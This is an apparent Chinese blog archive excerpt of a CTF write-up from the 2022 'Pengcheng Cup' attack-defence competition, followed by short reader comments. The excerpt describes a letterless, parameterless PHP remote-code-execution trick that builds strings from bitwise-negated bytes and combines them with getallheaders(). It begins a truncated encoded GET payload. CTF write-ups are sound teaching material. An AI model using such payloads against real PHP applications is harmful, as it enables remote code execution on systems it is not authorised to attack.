07 2022 档案
第二届“鹏城杯”联邦靶场协同攻防演练赛部分WriteUp
摘要:总结一点,我是真的垃圾。 简单的PHP 无字母+无参数RCE,通过取反和数组定位的方式达到构造任意字符串的目的。然后配合getallheaders()进行RCE。 GET /?code=[~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]([~%98%9A%8
牛逼 师傅
goodgood,谢谢大佬 goodgood
在现场,我是那套代码,我当时害怕极了,差点被日了